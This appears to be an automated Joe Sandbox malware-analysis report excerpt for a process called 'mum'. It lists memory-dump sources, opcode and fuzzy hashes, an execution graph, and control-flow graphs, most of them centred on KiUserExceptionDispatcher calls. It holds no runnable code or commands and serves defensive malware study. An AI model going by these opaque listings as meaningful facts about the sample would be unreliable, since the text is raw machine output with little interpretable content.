                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.1047161045.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_2c0000_mum.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 345c9b30d2366388bd6d0692f55141bc4bfe9941e473a2b906c68f914c647489
                                      • Instruction ID: ebd90f03699bab6927e75be2baa7007f19fe18a950b11ce54a8dc4df17c042f9
                                      • Opcode Fuzzy Hash: 345c9b30d2366388bd6d0692f55141bc4bfe9941e473a2b906c68f914c647489
                                      • Instruction Fuzzy Hash: 7FB0123031860A4A36905BB26D05B2277CC5A115043400634980CC0011F904D4204240
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:20.9%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:231
                                      Total number of Limit Nodes:16
                                      execution_graph 9571 251548 9572 251564 9571->9572 9670 252620 9572->9670 9573 251599 9674 254758 9573->9674 9577 2515d1 9694 25ce88 9577->9694 9582 2515f4 9717 25e440 9582->9717 9589 251625 9749 5f0490 9589->9749 9753 5f04a0 9589->9753 9590 25162c 9757 5f08f8 9590->9757 9761 5f08e8 9590->9761 9591 251633 9765 5f0d41 9591->9765 9769 5f0d50 9591->9769 9592 25163a 9773 5f11a8 9592->9773 9777 5f1198 9592->9777 9593 251641 9781 5f15f1 9593->9781 9785 5f1600 9593->9785 9594 251648 9789 5f1a58 9594->9789 9793 5f1a4a 9594->9793 9595 25164f 9797 5f5258 9595->9797 9597 25168a 9809 5f5b30 9597->9809 9813 5f5b20 9597->9813 9598 251691 9817 5f5f78 9598->9817 9821 5f5f88 9598->9821 9599 251698 9825 5f63d1 9599->9825 9829 5f63e0 9599->9829 9600 25169f 9833 5f6838 9600->9833 9837 5f6828 9600->9837 9601 2516a6 9841 5f6c80 9601->9841 9845 5f6c90 9601->9845 9602 2516ad 9849 5f7106 9602->9849 9853 5f7110 9602->9853 9603 2516bb 9857 5f7558 9603->9857 9861 5f7568 9603->9861 9604 2516c2 9865 5f79b1 9604->9865 9869 5f79c0 9604->9869 9605 2516c9 9873 5f7e09 9605->9873 9877 5f7e18 9605->9877 9606 2516d0 9881 5f8260 9606->9881 9885 5f8270 9606->9885 9607 2516d7 9889 5f86b8 9607->9889 9893 5f86c8 9607->9893 9608 2516de 9897 5f8b20 9608->9897 9901 5f8b1a 9608->9901 9609 2516e5 9905 5f8f69 9609->9905 9909 5f8f78 9609->9909 9610 2516ec 9671 252634 KiUserExceptionDispatcher 9670->9671 9673 25270e 9671->9673 9673->9573 9676 25478a 9674->9676 9675 2515bc 9679 25c17f 9675->9679 9676->9675 9913 25bd93 9676->9913 9917 25bbf8 9676->9917 9682 25c187 9679->9682 9680 2515c3 9683 25c5da 9680->9683 9681 25bbf8 KiUserExceptionDispatcher 9681->9682 9682->9680 9682->9681 9684 25c5e3 9683->9684 9685 2515ca 9684->9685 9686 25bbf8 KiUserExceptionDispatcher 9684->9686 9687 25ca30 9685->9687 9686->9684 9691 25c704 9687->9691 9693 25ca3a 9687->9693 9688 25c9e9 9688->9577 9689 25ce41 9689->9577 9690 25bbf8 KiUserExceptionDispatcher 9690->9691 9691->9688 9691->9690 9692 25bbf8 KiUserExceptionDispatcher 9692->9693 9693->9689 9693->9692 9697 25ceba 9694->9697 9695 2515d8 9698 25d2e0 9695->9698 9696 25bbf8 KiUserExceptionDispatcher 9696->9697 9697->9695 9697->9696 9700 25d312 9698->9700 9699 2515df 9702 25d738 9699->9702 9700->9699 9701 25bbf8 KiUserExceptionDispatcher 9700->9701 9701->9700 9703 25d76a 9702->9703 9704 2515e6 9703->9704 9705 25bbf8 KiUserExceptionDispatcher 9703->9705 9706 25db90 9704->9706 9705->9703 9709 25dbc2 9706->9709 9707 2515ed 9710 25dfe8 9707->9710 9708 25bbf8 KiUserExceptionDispatcher 9708->9709 9709->9707 9709->9708 9715 25dcbc 9710->9715 9716 25dff2 9710->9716 9711 25dfa1 9711->9582 9712 25e3f9 9712->9582 9713 25bbf8 KiUserExceptionDispatcher 9713->9715 9714 25bbf8 KiUserExceptionDispatcher 9714->9716 9715->9711 9715->9713 9716->9712 9716->9714 9718 25e472 9717->9718 9719 2515fb 9718->9719 9720 25bbf8 KiUserExceptionDispatcher 9718->9720 9721 25e89a 9719->9721 9720->9718 9724 25e8ca 9721->9724 9722 251602 9725 25ecf0 9722->9725 9723 25bbf8 KiUserExceptionDispatcher 9723->9724 9724->9722 9724->9723 9728 25ed22 9725->9728 9726 251609 9729 25f148 9726->9729 9727 25bbf8 KiUserExceptionDispatcher 9727->9728 9728->9726 9728->9727 9732 25f17a 9729->9732 9730 251610 9733 25f5a2 9730->9733 9731 25bbf8 KiUserExceptionDispatcher 9731->9732 9732->9730 9732->9731 9736 25f5d2 9733->9736 9734 251617 9737 25f9fa 9734->9737 9735 25bbf8 KiUserExceptionDispatcher 9735->9736 9736->9734 9736->9735 9740 25fa0c 9737->9740 9738 25161e 9741 5f0006 9738->9741 9745 5f0048 9738->9745 9739 25bbf8 KiUserExceptionDispatcher 9739->9740 9740->9738 9740->9739 9742 5f004c KiUserExceptionDispatcher 9741->9742 9744 5f0124 9742->9744 9744->9589 9746 5f006a KiUserExceptionDispatcher 9745->9746 9748 5f0124 9746->9748 9748->9589 9750 5f04a0 KiUserExceptionDispatcher 9749->9750 9752 5f057c 9750->9752 9752->9590 9754 5f04c2 KiUserExceptionDispatcher 9753->9754 9756 5f057c 9754->9756 9756->9590 9758 5f091a KiUserExceptionDispatcher 9757->9758 9760 5f09d4 9758->9760 9760->9591 9762 5f08f8 KiUserExceptionDispatcher 9761->9762 9764 5f09d4 9762->9764 9764->9591 9766 5f0d54 KiUserExceptionDispatcher 9765->9766 9768 5f0e2c 9766->9768 9768->9592 9770 5f0d72 KiUserExceptionDispatcher 9769->9770 9772 5f0e2c 9770->9772 9772->9592 9774 5f11ca KiUserExceptionDispatcher 9773->9774 9776 5f1284 9774->9776 9776->9593 9778 5f11ca KiUserExceptionDispatcher 9777->9778 9780 5f1284 9778->9780 9780->9593 9782 5f15fd KiUserExceptionDispatcher 9781->9782 9784 5f16dc 9782->9784 9784->9594 9786 5f1622 KiUserExceptionDispatcher 9785->9786 9788 5f16dc 9786->9788 9788->9594 9790 5f1a7a KiUserExceptionDispatcher 9789->9790 9792 5f1b34 9790->9792 9792->9595 9794 5f1a5c KiUserExceptionDispatcher 9793->9794 9796 5f1b34 9794->9796 9796->9595 9798 5f527a KiUserExceptionDispatcher 9797->9798 9800 25167c 9798->9800 9801 5f56d8 9800->9801 9805 5f56d0 9800->9805 9802 5f56fa KiUserExceptionDispatcher 9801->9802 9804 5f57b4 9802->9804 9804->9597 9806 5f56d8 KiUserExceptionDispatcher 9805->9806 9808 5f57b4 9806->9808 9808->9597 9810 5f5b52 KiUserExceptionDispatcher 9809->9810 9812 5f5c0c 9810->9812 9812->9598 9814 5f5b30 KiUserExceptionDispatcher 9813->9814 9816 5f5c0c 9814->9816 9816->9598 9818 5f5f85 KiUserExceptionDispatcher 9817->9818 9820 5f6064 9818->9820 9820->9599 9822 5f5faa KiUserExceptionDispatcher 9821->9822 9824 5f6064 9822->9824 9824->9599 9826 5f63e0 KiUserExceptionDispatcher 9825->9826 9828 5f64bc 9826->9828 9828->9600 9830 5f6402 KiUserExceptionDispatcher 9829->9830 9832 5f64bc 9830->9832 9832->9600 9834 5f685a KiUserExceptionDispatcher 9833->9834 9836 5f6914 9834->9836 9836->9601 9838 5f6838 KiUserExceptionDispatcher 9837->9838 9840 5f6914 9838->9840 9840->9601 9842 5f6c90 KiUserExceptionDispatcher 9841->9842 9844 5f6d6c 9842->9844 9844->9602 9846 5f6cb2 KiUserExceptionDispatcher 9845->9846 9848 5f6d6c 9846->9848 9848->9602 9850 5f7110 KiUserExceptionDispatcher 9849->9850 9852 5f71ed 9850->9852 9852->9603 9854 5f7132 KiUserExceptionDispatcher 9853->9854 9856 5f71ed 9854->9856 9856->9603 9858 5f7568 KiUserExceptionDispatcher 9857->9858 9860 5f7644 9858->9860 9860->9604 9862 5f758a KiUserExceptionDispatcher 9861->9862 9864 5f7644 9862->9864 9864->9604 9866 5f79c0 KiUserExceptionDispatcher 9865->9866 9868 5f7a9c 9866->9868 9868->9605 9870 5f79e2 KiUserExceptionDispatcher 9869->9870 9872 5f7a9c 9870->9872 9872->9605 9874 5f7e18 KiUserExceptionDispatcher 9873->9874 9876 5f7ef4 9874->9876 9876->9606 9878 5f7e3a KiUserExceptionDispatcher 9877->9878 9880 5f7ef4 9878->9880 9880->9606 9882 5f8270 KiUserExceptionDispatcher 9881->9882 9884 5f834c 9882->9884 9884->9607 9886 5f8292 KiUserExceptionDispatcher 9885->9886 9888 5f834c 9886->9888 9888->9607 9890 5f86c8 KiUserExceptionDispatcher 9889->9890 9892 5f87a4 9890->9892 9892->9608 9894 5f86ea KiUserExceptionDispatcher 9893->9894 9896 5f87a4 9894->9896 9896->9608 9898 5f8b42 KiUserExceptionDispatcher 9897->9898 9900 5f8bfc 9898->9900 9900->9609 9902 5f8b24 KiUserExceptionDispatcher 9901->9902 9904 5f8bfc 9902->9904 9904->9609 9906 5f8f7c KiUserExceptionDispatcher 9905->9906 9908 5f9054 9906->9908 9908->9610 9910 5f8f9a KiUserExceptionDispatcher 9909->9910 9912 5f9054 9910->9912 9912->9610 9914 25bc57 9913->9914 9915 25bd4a KiUserExceptionDispatcher 9914->9915 9916 25bd3b 9914->9916 9915->9916 9916->9676 9920 25bc1f 9917->9920 9918 25bd4a KiUserExceptionDispatcher 9919 25bd3b 9918->9919 9919->9676 9920->9918 9920->9919

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 971 252620-252650 973 252657-25271c KiUserExceptionDispatcher 971->973 974 252652 971->974 980 252722-25273a 973->980 981 252a3a-252a6c 973->981 974->973 984 252741-25274a 980->984 985 25273c 980->985 986 252a2d-252a33 984->986 985->984 987 25274f-2527c9 986->987 988 252a39 986->988 993 252885-2528e0 987->993 994 2527cf-25283d 987->994 988->981 1005 2528e1-25292f 993->1005 1003 252880-252883 994->1003 1004 25283f-25287f 994->1004 1003->1005 1004->1003 1010 252935-252a17 1005->1010 1011 252a18-252a23 1005->1011 1010->1011 1013 252a25 1011->1013 1014 252a2a 1011->1014 1013->1014 1014->986
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 002526FC
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1276328413.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_250000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: a8fb7027148f414810e83a54f1c909de796fdeb742f69a151d08d50a0c0f0ba8
                                      • Instruction ID: 97a068e320e3649f0a9fdd2859a29235905eb0f933569d08b22df03a8c618e0a
                                      • Opcode Fuzzy Hash: a8fb7027148f414810e83a54f1c909de796fdeb742f69a151d08d50a0c0f0ba8
                                      • Instruction Fuzzy Hash: 31D1E274E00218CFDB14DFA5C994B9DBBB2BF89305F2481AAD809AB365DB345E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1404 5f5258-5f5278 1405 5f527f-5f5342 KiUserExceptionDispatcher 1404->1405 1406 5f527a 1404->1406 1412 5f565a-5f568c 1405->1412 1413 5f5348-5f535f 1405->1413 1406->1405 1416 5f5366-5f536f 1413->1416 1417 5f5361 1413->1417 1418 5f564d-5f5653 1416->1418 1417->1416 1419 5f5659 1418->1419 1420 5f5374-5f53ea 1418->1420 1419->1412 1425 5f54a6-5f5500 1420->1425 1426 5f53f0-5f545e 1420->1426 1437 5f5501-5f554f 1425->1437 1435 5f54a1-5f54a4 1426->1435 1436 5f5460-5f54a0 1426->1436 1435->1437 1436->1435 1442 5f5638-5f5643 1437->1442 1443 5f5555-5f5637 1437->1443 1445 5f564a 1442->1445 1446 5f5645 1442->1446 1443->1442 1445->1418 1446->1445
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F5323
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: a5528f61de165239ab1a8506155bf8511a012e29d2e50d285c86a9d85befa160
                                      • Instruction ID: 02f695aea942763ad0749b4150e9cd654061e8d4575d79357ac50b80b73e1207
                                      • Opcode Fuzzy Hash: a5528f61de165239ab1a8506155bf8511a012e29d2e50d285c86a9d85befa160
                                      • Instruction Fuzzy Hash: 29C1D374E00218CFDB14DFA5C994BADBBB2BF89305F2081AAD909AB355DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1350 5f1a58-5f1a78 1351 5f1a7f-5f1b2c KiUserExceptionDispatcher 1350->1351 1352 5f1a7a 1350->1352 1357 5f1b34-5f1b42 1351->1357 1352->1351 1358 5f1e5a-5f1e8c 1357->1358 1359 5f1b48-5f1b5f 1357->1359 1362 5f1b66-5f1b6f 1359->1362 1363 5f1b61 1359->1363 1364 5f1e4d-5f1e53 1362->1364 1363->1362 1365 5f1e59 1364->1365 1366 5f1b74-5f1bea 1364->1366 1365->1358 1371 5f1ca6-5f1d00 1366->1371 1372 5f1bf0-5f1c5e 1366->1372 1383 5f1d01-5f1d4f 1371->1383 1381 5f1ca1-5f1ca4 1372->1381 1382 5f1c60-5f1ca0 1372->1382 1381->1383 1382->1381 1388 5f1e38-5f1e43 1383->1388 1389 5f1d55-5f1e37 1383->1389 1390 5f1e4a 1388->1390 1391 5f1e45 1388->1391 1389->1388 1390->1364 1391->1390
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F1B23
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: bb70c0876fb0042681ad6031c1243ddc95d3b76addeaea14aec6a159394c57ac
                                      • Instruction ID: f46dd050cd0694f54e6f633c8797dfaf8c83d0138ae633c43db60bb02bf76c91
                                      • Opcode Fuzzy Hash: bb70c0876fb0042681ad6031c1243ddc95d3b76addeaea14aec6a159394c57ac
                                      • Instruction Fuzzy Hash: 6AC1D474E00218CFDB14DFA5C994BADBBB2BF89305F2081AAD909AB355DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1188 5f0d50-5f0d70 1189 5f0d77-5f0e24 KiUserExceptionDispatcher 1188->1189 1190 5f0d72 1188->1190 1195 5f0e2c-5f0e3a 1189->1195 1190->1189 1196 5f1152-5f1184 1195->1196 1197 5f0e40-5f0e57 1195->1197 1200 5f0e5e-5f0e67 1197->1200 1201 5f0e59 1197->1201 1202 5f1145-5f114b 1200->1202 1201->1200 1203 5f0e6c-5f0ee2 1202->1203 1204 5f1151 1202->1204 1209 5f0f9e-5f0ff8 1203->1209 1210 5f0ee8-5f0f56 1203->1210 1204->1196 1221 5f0ff9-5f1047 1209->1221 1219 5f0f99-5f0f9c 1210->1219 1220 5f0f58-5f0f98 1210->1220 1219->1221 1220->1219 1226 5f104d-5f112f 1221->1226 1227 5f1130-5f113b 1221->1227 1226->1227 1229 5f113d 1227->1229 1230 5f1142 1227->1230 1229->1230 1230->1202
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F0E1B
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 5d9aad2ba77c2d3a6947154986e9650beda1c7084446952f324c31deec87d60b
                                      • Instruction ID: 92a7b2870ae0bcdc8ad7409a4c2bc63c66678a723108f6d8edaf2d1c120ad533
                                      • Opcode Fuzzy Hash: 5d9aad2ba77c2d3a6947154986e9650beda1c7084446952f324c31deec87d60b
                                      • Instruction Fuzzy Hash: CDC1E574E00218CFDB14DFA5C994BADBBB2BF89304F2091AAD909AB355DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1026 5f0048-5f0068 1027 5f006f-5f011c KiUserExceptionDispatcher 1026->1027 1028 5f006a 1026->1028 1033 5f0124-5f0132 1027->1033 1028->1027 1034 5f044a-5f047c 1033->1034 1035 5f0138-5f014f 1033->1035 1038 5f0156-5f015f 1035->1038 1039 5f0151 1035->1039 1040 5f043d-5f0443 1038->1040 1039->1038 1041 5f0449 1040->1041 1042 5f0164-5f01da 1040->1042 1041->1034 1047 5f0296-5f02f0 1042->1047 1048 5f01e0-5f024e 1042->1048 1059 5f02f1-5f033f 1047->1059 1057 5f0291-5f0294 1048->1057 1058 5f0250-5f0290 1048->1058 1057->1059 1058->1057 1064 5f0428-5f0433 1059->1064 1065 5f0345-5f0427 1059->1065 1066 5f043a 1064->1066 1067 5f0435 1064->1067 1065->1064 1066->1040 1067->1066
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F0113
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 2e952601500bd7dcdcf773934b60c9e2908abdd25ed0d2e4c6216c09fd32b6a6
                                      • Instruction ID: 94c48e3438d58ac324c2458b2adee7ce72690bebb4dcf70fd462208649c766dd
                                      • Opcode Fuzzy Hash: 2e952601500bd7dcdcf773934b60c9e2908abdd25ed0d2e4c6216c09fd32b6a6
                                      • Instruction Fuzzy Hash: 90C1E474E00218CFDB14DFA5C994BADBBB2BF89304F2490AAD909AB355DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F9043
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 9be6771104b620116776ca981bb58c3f9d06901cef98ad730d55443f97d9610b
                                      • Instruction ID: 225b6231530893cec1bee6d5b49aab3adaf9d8d4cf1aefe979d84bde04eeb7c9
                                      • Opcode Fuzzy Hash: 9be6771104b620116776ca981bb58c3f9d06901cef98ad730d55443f97d9610b
                                      • Instruction Fuzzy Hash: 5DC1D374E00218CFDB14DFA5C994BADBBB2BF89304F2081AAD909AB355DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F833B
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: da2dfb18f61a4e5b36a656f345f8ae790d344b5192bfa0526d07b832f25b3784
                                      • Instruction ID: cbafa99d7b2a5131d780972186244de25dba555544b0b78e23a30b66ee670f8e
                                      • Opcode Fuzzy Hash: da2dfb18f61a4e5b36a656f345f8ae790d344b5192bfa0526d07b832f25b3784
                                      • Instruction Fuzzy Hash: 0EC1D474E00218CFDB14DFA5C994BADBBB2BF89304F2081A9D909AB355DB359E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F7633
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 1294e3e70162906bfd897308c5f15bd8b3367001382aec4ea99cebde2b5485bf
                                      • Instruction ID: 581023411c85e1b0d4e2008f7c1d3cc4137bd5c9c4ac24223c26c833c417c3ac
                                      • Opcode Fuzzy Hash: 1294e3e70162906bfd897308c5f15bd8b3367001382aec4ea99cebde2b5485bf
                                      • Instruction Fuzzy Hash: F1C1C274E04218CFDB14DFA5C994BADBBB2BF89304F2081AAD909AB355DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F7EE3
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: b42f85588cdafc88059a5968fed8399a2d1fb919ac052b37ddfde69c89f3e669
                                      • Instruction ID: 43088340b3cf2a0ae6a9b75538e4c0aa4e233ffd634cd8646a6ee1fba89bfd51
                                      • Opcode Fuzzy Hash: b42f85588cdafc88059a5968fed8399a2d1fb919ac052b37ddfde69c89f3e669
                                      • Instruction Fuzzy Hash: 00C1D374E00218CFDB14DFA5C994BADBBB2BF89304F2081AAD909AB355DB355E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F71DC
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: efa0c718b29076d6e5bc92aa99af3af85f08c396bc116015712c84e493680473
                                      • Instruction ID: 0e48c992024b293efa394410f5016b7360bcda008a97ab928e4fc8f3127ea406
                                      • Opcode Fuzzy Hash: efa0c718b29076d6e5bc92aa99af3af85f08c396bc116015712c84e493680473
                                      • Instruction Fuzzy Hash: 8DC1E474E00218CFDB14DFA5C994BADBBB2BF89305F2080AAD909AB355DB355E85CF10
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1296 5f1600-5f1620 1297 5f1627-5f16d4 KiUserExceptionDispatcher 1296->1297 1298 5f1622 1296->1298 1303 5f16dc-5f16ea 1297->1303 1298->1297 1304 5f1a02-5f1a34 1303->1304 1305 5f16f0-5f1707 1303->1305 1308 5f170e-5f1717 1305->1308 1309 5f1709 1305->1309 1310 5f19f5-5f19fb 1308->1310 1309->1308 1311 5f171c-5f1792 1310->1311 1312 5f1a01 1310->1312 1317 5f184e-5f18a8 1311->1317 1318 5f1798-5f1806 1311->1318 1312->1304 1329 5f18a9-5f18f7 1317->1329 1327 5f1849-5f184c 1318->1327 1328 5f1808-5f1848 1318->1328 1327->1329 1328->1327 1334 5f18fd-5f19df 1329->1334 1335 5f19e0-5f19eb 1329->1335 1334->1335 1336 5f19ed 1335->1336 1337 5f19f2 1335->1337 1336->1337 1337->1310
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F16CB
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 87db0535a012d8709424e232a0d0734004b326036ab2c151caf599210ac943ec
                                      • Instruction ID: d493186e4e8bb67ed3ed366bc8ccab444083aeb2eed585d8aa2fa8ea24ef4dd6
                                      • Opcode Fuzzy Hash: 87db0535a012d8709424e232a0d0734004b326036ab2c151caf599210ac943ec
                                      • Instruction Fuzzy Hash: F9C1E474E00218CFDB14DFA5C994BADBBB2BF89304F2081AAD909AB355DB355E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1674 5f6838-5f6858 1675 5f685f-5f690c KiUserExceptionDispatcher 1674->1675 1676 5f685a 1674->1676 1681 5f6914-5f6922 1675->1681 1676->1675 1682 5f6c3a-5f6c6c 1681->1682 1683 5f6928-5f693f 1681->1683 1686 5f6946-5f694f 1683->1686 1687 5f6941 1683->1687 1688 5f6c2d-5f6c33 1686->1688 1687->1686 1689 5f6c39 1688->1689 1690 5f6954-5f69ca 1688->1690 1689->1682 1695 5f6a86-5f6ae0 1690->1695 1696 5f69d0-5f6a3e 1690->1696 1707 5f6ae1-5f6b2f 1695->1707 1705 5f6a81-5f6a84 1696->1705 1706 5f6a40-5f6a80 1696->1706 1705->1707 1706->1705 1712 5f6c18-5f6c23 1707->1712 1713 5f6b35-5f6c17 1707->1713 1715 5f6c2a 1712->1715 1716 5f6c25 1712->1716 1713->1712 1715->1688 1716->1715
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F6903
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 1d0266712f054288813f73e235c88d6948cbebec46ccbabf206c19e861d26877
                                      • Instruction ID: 8341bed49afdee0d3d28d1bceb9c7d4f81f5c2ff0b8020a1ca074fff9acdc77a
                                      • Opcode Fuzzy Hash: 1d0266712f054288813f73e235c88d6948cbebec46ccbabf206c19e861d26877
                                      • Instruction Fuzzy Hash: 8BC1C274E00218CFDB14DFA5C994BADBBB2BF89304F2081A9D909AB355DB355E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1512 5f5b30-5f5b50 1513 5f5b57-5f5c04 KiUserExceptionDispatcher 1512->1513 1514 5f5b52 1512->1514 1519 5f5c0c-5f5c1a 1513->1519 1514->1513 1520 5f5f32-5f5f64 1519->1520 1521 5f5c20-5f5c37 1519->1521 1524 5f5c3e-5f5c47 1521->1524 1525 5f5c39 1521->1525 1526 5f5f25-5f5f2b 1524->1526 1525->1524 1527 5f5c4c-5f5cc2 1526->1527 1528 5f5f31 1526->1528 1533 5f5d7e-5f5dd8 1527->1533 1534 5f5cc8-5f5d36 1527->1534 1528->1520 1545 5f5dd9-5f5e27 1533->1545 1543 5f5d79-5f5d7c 1534->1543 1544 5f5d38-5f5d78 1534->1544 1543->1545 1544->1543 1550 5f5e2d-5f5f0f 1545->1550 1551 5f5f10-5f5f1b 1545->1551 1550->1551 1552 5f5f1d 1551->1552 1553 5f5f22 1551->1553 1552->1553 1553->1526
                                      APIs
                                      • KiUserExceptionDispatcher.NTDLL ref: 005F5BFB
                                      Memory Dump Source
                                      • Source File: 00000022.00000002.1280993992.00000000005F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_34_2_5f0000_mum.jbxd
                                      Similarity
                                      • API ID: DispatcherExceptionUser
                                      • String ID:
                                      • API String ID: 6842923-0
                                      • Opcode ID: 4f08c1504b54fad0d061e860556dbe8f64185dc20d7bd209a8e881900d3f2580
                                      • Instruction ID: 486214cebf75180e4a9a14286212a9f6a610b64d44e6a08edf8795b479a053f4
                                      • Opcode Fuzzy Hash: 4f08c1504b54fad0d061e860556dbe8f64185dc20d7bd209a8e881900d3f2580
                                      • Instruction Fuzzy Hash: 90C1D374E00218CFDB14DFA5C994BADBBB2BF89304F2080AAD909AB355DB355E85CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
